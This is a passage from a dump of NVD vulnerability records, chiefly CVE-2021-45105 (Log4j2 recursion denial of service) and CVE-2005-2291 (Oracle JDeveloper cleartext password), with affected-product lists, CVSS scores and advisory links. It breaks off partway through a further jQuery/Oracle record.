"cpe:2.3:a:oracle:management_cloud_engine:1.5.0:*:*:*:*:*:*:*", matchCriteriaId: "3F66C747-733F-46A1-9A6B-EEB1A1AEC45D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:mysql_enterprise_monitor:*:*:*:*:*:*:*:*", matchCriteriaId: "B0EBAC6D-D0CE-42A1-AEA0-2D50C8035747", versionEndIncluding: "8.0.29", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:payment_interface:19.1:*:*:*:*:*:*:*", matchCriteriaId: "5D01A0EC-3846-4A74-A174-3797078DC699", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:payment_interface:20.3:*:*:*:*:*:*:*", matchCriteriaId: "03E5FCFB-093A-48E9-8A4E-34C993D2764E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:*", matchCriteriaId: "D9DB4A14-2EF5-4B54-95D2-75E6CF9AA0A9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.59:*:*:*:*:*:*:*", matchCriteriaId: 
"C8AF00C6-B97F-414D-A8DF-057E6BFD8597", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*", matchCriteriaId: "8B1C88FD-C2EC-4C96-AC7E-6F95C8763B48", versionEndIncluding: "17.12.11", versionStartIncluding: "17.12.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*", matchCriteriaId: "A621A5AE-6974-4BA5-B1AC-7130A46F68F5", versionEndIncluding: "18.8.13", versionStartIncluding: "18.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*", matchCriteriaId: "4096281D-2EBA-490D-8180-3C9D05EB890A", versionEndIncluding: "19.12.12", versionStartIncluding: "19.12.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*", matchCriteriaId: "E6B70E72-B9FC-4E49-8EDD-29C7E14F5792", versionEndIncluding: "20.12.7", versionStartIncluding: "20.12.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:21.12.0:*:*:*:*:*:*:*", matchCriteriaId: "15F45363-236B-4040-8AE4-C6C0E204EDBA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:*:*:*:*:*:*:*:*", matchCriteriaId: "AD0DEC50-F4CD-4ACA-A118-D4F0D4F4C981", versionEndIncluding: "19.12.18.0", versionStartIncluding: "19.12.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:*:*:*:*:*:*:*:*", matchCriteriaId: "651104CE-0569-4E6D-ACAB-AD2AC85084DD", versionEndIncluding: "20.12.12.0", versionStartIncluding: "20.12.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:21.12.0.0:*:*:*:*:*:*:*", matchCriteriaId: "45D89239-9142-46BD-846D-76A5A74A67B1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*", matchCriteriaId: "202AD518-2E9B-4062-B063-9858AE1F9CE2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:19.12:*:*:*:*:*:*:*", matchCriteriaId: 
"10864586-270E-4ACF-BDCC-ECFCD299305F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:20.12:*:*:*:*:*:*:*", matchCriteriaId: "38340E3C-C452-4370-86D4-355B6B4E0A06", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:21.12:*:*:*:*:*:*:*", matchCriteriaId: "E9C55C69-E22E-4B80-9371-5CD821D79FE2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_back_office:14.1:*:*:*:*:*:*:*", matchCriteriaId: "F0735989-13BD-40B3-B954-AC0529C5B53D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_central_office:14.1:*:*:*:*:*:*:*", matchCriteriaId: "58405263-E84C-4071-BB23-165D49034A00", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_customer_insights:15.0.2:*:*:*:*:*:*:*", matchCriteriaId: "3D1C35DF-D30D-42C8-B56D-C809609AB2A4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_customer_insights:16.0.2:*:*:*:*:*:*:*", matchCriteriaId: "834B4CE7-042E-489F-AE19-0EEA2C37E7A8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_data_extractor_for_merchandising:15.0.2:*:*:*:*:*:*:*", matchCriteriaId: "82653579-FF7D-4492-9CA2-B3DF6A708831", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_data_extractor_for_merchandising:16.0.2:*:*:*:*:*:*:*", matchCriteriaId: "32D2EB48-F9A2-4D23-81C5-4B30F2D785DF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_eftlink:16.0.3:*:*:*:*:*:*:*", matchCriteriaId: "F3796186-D3A7-4259-846B-165AD9CEB7F1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_eftlink:17.0.2:*:*:*:*:*:*:*", matchCriteriaId: "CEDA5540-692D-47DA-9F68-83158D9AE628", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_eftlink:18.0.1:*:*:*:*:*:*:*", matchCriteriaId: "C5435583-C454-4AC9-8A35-D2D30EB252EE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_eftlink:19.0.1:*:*:*:*:*:*:*", matchCriteriaId: "A2140357-503A-4D2A-A099-CFA4DC649E41", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_eftlink:20.0.1:*:*:*:*:*:*:*", matchCriteriaId: 
"6BAE5686-8E11-4EF1-BC7E-5C565F2440C7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_eftlink:21.0.0:*:*:*:*:*:*:*", matchCriteriaId: "F4B95628-F108-424A-8C19-40A5F5B7D37B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_financial_integration:*:*:*:*:*:*:*:*", matchCriteriaId: "1E03B340-8C77-4DFA-8536-C57656E237D0", versionEndIncluding: "16.0.3", versionStartIncluding: "16.0.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_financial_integration:14.1.3.2:*:*:*:*:*:*:*", matchCriteriaId: "798E4FEE-9B2B-436E-A2B3-B8AA1079892A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_financial_integration:15.0.3.1:*:*:*:*:*:*:*", matchCriteriaId: "CB86F6C3-981E-4ECA-A5EB-9A9CD73D70C9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_financial_integration:19.0.0:*:*:*:*:*:*:*", matchCriteriaId: "4B7B0B33-2361-4CF5-8075-F609858A582E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_financial_integration:19.0.1:*:*:*:*:*:*:*", matchCriteriaId: "7435071D-0C95-4686-A978-AFC4C9A0D0FE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_integration_bus:*:*:*:*:*:*:*:*", matchCriteriaId: "A921C710-1C59-429F-B985-67C0DBFD695E", versionEndIncluding: "16.0.3", versionStartIncluding: "16.0.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_integration_bus:*:*:*:*:*:*:*:*", matchCriteriaId: "B9E458AF-0EEC-453E-AA9D-6C79211000AC", versionEndIncluding: "19.0.1.0", versionStartIncluding: "19.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_integration_bus:14.1.3:*:*:*:*:*:*:*", matchCriteriaId: "F1AFAE16-B69F-410A-8CE3-1CDD998A8433", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_integration_bus:14.1.3.2:*:*:*:*:*:*:*", matchCriteriaId: "8CFCE558-9972-46A2-8539-C16044F1BAA9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_integration_bus:15.0.3.1:*:*:*:*:*:*:*", matchCriteriaId: "A1194C4E-CF42-4B4D-BA9A-40FDD28F1D58", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:retail_integration_bus:19.0.0:*:*:*:*:*:*:*", matchCriteriaId: "DFDF4CB0-4680-449A-8576-915721D59500", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_integration_bus:19.0.1:*:*:*:*:*:*:*", matchCriteriaId: "BD311C33-A309-44D5-BBFB-539D72C7F8C4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_invoice_matching:15.0.3:*:*:*:*:*:*:*", matchCriteriaId: "A0472632-4104-4397-B619-C4E86A748465", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_invoice_matching:16.0.3:*:*:*:*:*:*:*", matchCriteriaId: "48E25E7C-F7E8-4739-8251-00ACD11C12FE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_merchandising_system:16.0.3:*:*:*:*:*:*:*", matchCriteriaId: "F8383028-B719-41FD-9B6A-71F8EB4C5F8D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_merchandising_system:19.0.1:*:*:*:*:*:*:*", matchCriteriaId: "AE1BC44A-F0AF-41CD-9CEB-B07AB5ADAB38", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_order_broker:16.0:*:*:*:*:*:*:*", matchCriteriaId: "38E74E68-7F19-4EF3-AC00-3C249EAAA39E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_order_broker:18.0:*:*:*:*:*:*:*", matchCriteriaId: "0783F0D1-8FAC-4BCA-A6F5-C5C60E86D56D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_order_broker:19.1:*:*:*:*:*:*:*", matchCriteriaId: "C7BD0D41-1BED-4C4F-95C8-8987C98908DA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_order_management_system:19.5:*:*:*:*:*:*:*", matchCriteriaId: "99B5DC78-1C24-4F2B-A254-D833FAF47013", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_point-of-service:14.1:*:*:*:*:*:*:*", matchCriteriaId: "E13DF2AE-F315-4085-9172-6C8B21AF1C9E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_predictive_application_server:14.1.3.46:*:*:*:*:*:*:*", matchCriteriaId: "9002379B-4FDA-44F3-98EB-0C9B6083E429", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_predictive_application_server:15.0.3.115:*:*:*:*:*:*:*", matchCriteriaId: 
"476B038D-7F60-482D-87AD-B58BEA35558E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_predictive_application_server:16.0.3.240:*:*:*:*:*:*:*", matchCriteriaId: "AB86C644-7B79-4F87-A06D-C178E8C2B8B4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_price_management:13.2:*:*:*:*:*:*:*", matchCriteriaId: "C19C5CC9-544A-4E4D-8F0A-579BB5270F07", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_price_management:14.0.4:*:*:*:*:*:*:*", matchCriteriaId: "3E1A9B0C-735A-40B4-901C-663CF5162E96", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_price_management:14.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "0791694C-9B4E-42EA-8F6C-899B43B6D769", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_price_management:15.0.3.0:*:*:*:*:*:*:*", matchCriteriaId: "312992F0-E65A-4E38-A44C-363A7E157CE4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_price_management:16.0.3.0:*:*:*:*:*:*:*", matchCriteriaId: "E1940FD6-39FA-4F92-9625-F215D8051E80", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_returns_management:14.1:*:*:*:*:*:*:*", matchCriteriaId: "BDB925C6-2CBC-4D88-B9EA-F246F4F7A206", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_service_backbone:*:*:*:*:*:*:*:*", matchCriteriaId: "0CE45891-A6A5-4699-90A6-6F49E60A7987", versionEndIncluding: "16.0.3", versionStartIncluding: "16.0.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_service_backbone:14.1.3:*:*:*:*:*:*:*", matchCriteriaId: "D7FCC976-615C-4DE5-9F50-1B25E9553962", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_service_backbone:14.1.3.2:*:*:*:*:*:*:*", matchCriteriaId: "E702EBED-DB39-4084-84B1-258BC5FE7545", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_service_backbone:15.0.3.1:*:*:*:*:*:*:*", matchCriteriaId: "3F7956BF-D5B6-484B-999C-36B45CD8B75B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_service_backbone:19.0.0:*:*:*:*:*:*:*", matchCriteriaId: "0D14A54A-4B04-41DE-B731-844D8AC3BE23", vulnerable: 
true, }, { criteria: "cpe:2.3:a:oracle:retail_service_backbone:19.0.1:*:*:*:*:*:*:*", matchCriteriaId: "9DA6B655-A445-42E5-B6D9-70AB1C04774A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_service_backbone:19.0.1.0:*:*:*:*:*:*:*", matchCriteriaId: "5D57F5CB-E566-450F-B7D7-DD771F7C746C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_store_inventory_management:14.0.4.13:*:*:*:*:*:*:*", matchCriteriaId: "88458537-6DE8-4D79-BC71-9D08883AD0C1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_store_inventory_management:14.1.3.5:*:*:*:*:*:*:*", matchCriteriaId: "2E310654-0793-41CC-B049-C754AC31D016", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_store_inventory_management:14.1.3.14:*:*:*:*:*:*:*", matchCriteriaId: "4C5B22C6-97AF-4D1B-84C9-987C6F62C401", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_store_inventory_management:15.0.3.3:*:*:*:*:*:*:*", matchCriteriaId: "FFD9AAE5-9472-49C6-B054-DB76BEB86D35", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_store_inventory_management:15.0.3.8:*:*:*:*:*:*:*", matchCriteriaId: "A104FDBD-0B28-44EE-91A0-A0C8939865A3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_store_inventory_management:16.0.3.7:*:*:*:*:*:*:*", matchCriteriaId: "C2D60A4D-BB4F-4177-AFA8-A8DC8C111FB3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:siebel_ui_framework:*:*:*:*:*:*:*:*", matchCriteriaId: "889916ED-5EB2-49D6-8400-E6DBBD6C287F", versionEndIncluding: "21.12", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:sql_developer:*:*:*:*:*:*:*:*", matchCriteriaId: "1C470BAD-F7E2-4802-B1BE-E71EBB073DA1", versionEndExcluding: "21.4.2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:taleo_platform:*:*:*:*:*:*:*:*", matchCriteriaId: "4E1A18FB-85E6-4C5D-8F8A-12F86EDC6A2D", versionEndExcluding: "22.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_framework:*:*:*:*:*:*:*:*", matchCriteriaId: "51309958-121D-4649-AB9A-EBFA3A49F7CB", versionEndIncluding: 
"4.3.0.6.0", versionStartIncluding: "4.3.0.1.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_framework:4.4.0.0.0:*:*:*:*:*:*:*", matchCriteriaId: "3F906F04-39E4-4BE4-8A73-9D058AAADB43", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_framework:4.4.0.2.0:*:*:*:*:*:*:*", matchCriteriaId: "7B393A82-476A-4270-A903-38ED4169E431", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_framework:4.4.0.3.0:*:*:*:*:*:*:*", matchCriteriaId: "85CAE52B-C2CA-4C6B-A0B7-2B9D6F0499E2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_portal:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "D6A4F71A-4269-40FC-8F61-1D1301F2B728", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_portal:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "5A502118-5B2B-47AE-82EC-1999BD841103", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "D551CAB1-4312-44AA-BDA8-A030817E153A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_sites:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "174A6D2E-E42E-4C92-A194-C6A820CD7EF4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "F14A818F-AA16-4438-A3E4-E64C9287AC66", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*", matchCriteriaId: "04BCDC24-4A21-473C-8733-0D9CFB38A752", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. 
This issue was fixed in Log4j 2.17.0, 2.12.3, and 2.3.1.", }, { lang: "es", value: "Apache Log4j2 versiones 2.0-alpha1 hasta 2.16.0 (excluyendo las versiones 2.12.3 y 2.3.1) no protegían de la recursión no controlada de las búsquedas autorreferenciales. Esto permite a un atacante con control sobre los datos de Thread Context Map causar una denegación de servicio cuando es interpretada una cadena diseñada. Este problema se ha corregido en Log4j versiones 2.17.0, 2.12.3 y 2.3.1", }, ], id: "CVE-2021-45105", lastModified: "2024-11-21T06:31:58.170", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "MEDIUM", cvssData: { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 4.3, confidentialityImpact: "NONE", integrityImpact: "NONE", vectorString: "AV:N/AC:M/Au:N/C:N/I:N/A:P", version: "2.0", }, exploitabilityScore: 8.6, impactScore: 2.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 5.9, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, exploitabilityScore: 2.2, impactScore: 3.6, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2021-12-18T12:15:07.433", references: [ { source: "security@apache.org", tags: [ "Mailing List", "Mitigation", "Third Party Advisory", ], url: "http://www.openwall.com/lists/oss-security/2021/12/19/1", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: 
"https://cert-portal.siemens.com/productcert/pdf/ssa-501673.pdf", }, { source: "security@apache.org", tags: [ "Release Notes", "Vendor Advisory", ], url: "https://logging.apache.org/log4j/2.x/security.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20211218-0001/", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.debian.org/security/2021/dsa-5024", }, { source: "security@apache.org", tags: [ "Third Party Advisory", "US Government Resource", ], url: "https://www.kb.cert.org/vuls/id/930724", }, { source: "security@apache.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { source: "security@apache.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", "VDB Entry", ], url: "https://www.zerodayinitiative.com/advisories/ZDI-21-1541/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Mitigation", "Third Party Advisory", ], url: "http://www.openwall.com/lists/oss-security/2021/12/19/1", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: 
"https://cert-portal.siemens.com/productcert/pdf/ssa-501673.pdf", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Release Notes", "Vendor Advisory", ], url: "https://logging.apache.org/log4j/2.x/security.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20211218-0001/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.debian.org/security/2021/dsa-5024", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "US Government Resource", ], url: "https://www.kb.cert.org/vuls/id/930724", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "https://www.zerodayinitiative.com/advisories/ZDI-21-1541/", }, ], sourceIdentifier: "security@apache.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-20", }, { lang: "en", value: "CWE-674", }, ], source: "security@apache.org", type: "Secondary", }, { description: [ { lang: "en", value: "CWE-20", }, { lang: "en", value: "CWE-674", }, ], source: 
"nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Vendor | Product | Version | |
---|---|---|---|
oracle | jdeveloper | 9.0.4 | |
oracle | jdeveloper | 9.0.5 | |
oracle | jdeveloper | 10.1.2 | |
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:jdeveloper:9.0.4:*:*:*:*:*:*:*", matchCriteriaId: "E292E294-90C2-4780-82B6-1265F8FF6040", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:9.0.5:*:*:*:*:*:*:*", matchCriteriaId: "A5EA5B15-5ABD-459D-8327-9DDC1040C04D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:10.1.2:*:*:*:*:*:*:*", matchCriteriaId: "A4C7F9B0-2BF0-430D-ACB3-8E3A41AD31A3", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "Oracle JDeveloper 9.0.4, 9.0.5, and 10.1.2 passes the cleartext password as a parameter when starting sqlplus, which allows local users to gain sensitive information.", }, { lang: "es", value: "Oracle JDeveloper 9.0.4, 9.0.5, y 10.1.2 pasa el password en texto plano como parámetro cuando arranca \"sqlplus\", lo que permite que usuarios locales obtengan información confidencial.", }, ], id: "CVE-2005-2291", lastModified: "2025-04-03T01:03:51.193", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "MEDIUM", cvssData: { accessComplexity: "LOW", accessVector: "LOCAL", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 4.6, confidentialityImpact: "PARTIAL", integrityImpact: "PARTIAL", vectorString: "AV:L/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, exploitabilityScore: 3.9, impactScore: 6.4, obtainAllPrivilege: false, obtainOtherPrivilege: true, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], }, published: "2005-07-18T04:00:00.000", references: [ { source: "cve@mitre.org", url: "http://marc.info/?l=bugtraq&m=112129082323341&w=2", }, { source: "cve@mitre.org", tags: [ "Patch", "Vendor Advisory", ], url: "http://www.red-database-security.com/advisory/oracle_jdeveloper_passes_plaintext_password.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://marc.info/?l=bugtraq&m=112129082323341&w=2", }, { source: 
"af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Vendor Advisory", ], url: "http://www.red-database-security.com/advisory/oracle_jdeveloper_passes_plaintext_password.html", }, ], sourceIdentifier: "cve@mitre.org", vulnStatus: "Deferred", weaknesses: [ { description: [ { lang: "en", value: "NVD-CWE-Other", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:jquery:jquery:*:*:*:*:*:*:*:*", matchCriteriaId: "9CD7C3A9-7A77-4553-9893-D16D9FDC84AB", versionEndExcluding: "3.0.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.0.0:*:*:*:*:*:*:*", matchCriteriaId: "A079FD6E-3BB0-4997-9A8E-6F8FEC89887A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.1.0:*:*:*:*:*:*:*", matchCriteriaId: "900D2344-5160-42A0-8C49-36DBC7FF3D87", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.2.0:*:*:*:*:*:*:*", matchCriteriaId: "A4AA4B21-1BA9-4ED8-B9EA-558AF8655D24", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.3.0:*:*:*:*:*:*:*", matchCriteriaId: "9C3F9EE5-FCFC-45B8-9F57-C05D42EE0FF0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.3.1:*:*:*:*:*:*:*", matchCriteriaId: "E3DF1971-3FD9-4954-AF2D-DDA0B24B89CD", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.0:*:*:*:*:*:*:*", matchCriteriaId: "8972497F-6E24-45A9-9A18-EB0E842CB1D4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.1:*:*:*:*:*:*:*", matchCriteriaId: "400509A8-D6F2-432C-A2F1-AD5B8778D0D9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.2:*:*:*:*:*:*:*", matchCriteriaId: "132CE62A-FBFC-4001-81EC-35D81F73AF48", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "013043A2-0765-4AF5-ABFC-6A8960FFBFD2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "B887E174-57AB-449D-AEE4-82DD1A3E5C84", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "E869C417-C0E6-4FC3-B406-45598A1D1906", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_converged_application_server:*:*:*:*:*:*:*:*", matchCriteriaId: "EC361999-AAD8-4CB3-B00E-E3990C3529B4", versionEndExcluding: "7.0.0.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_interactive_session_recorder:6.0:*:*:*:*:*:*:*", matchCriteriaId: "C510CE66-DD71-45C8-B678-9BD81EC7FFBB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_interactive_session_recorder:6.1:*:*:*:*:*:*:*", matchCriteriaId: "BF0A211C-7C3D-46AE-B525-890A9194C422", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_interactive_session_recorder:6.2:*:*:*:*:*:*:*", matchCriteriaId: "B1AD7C68-81DF-4332-AEB3-B368E0221F52", 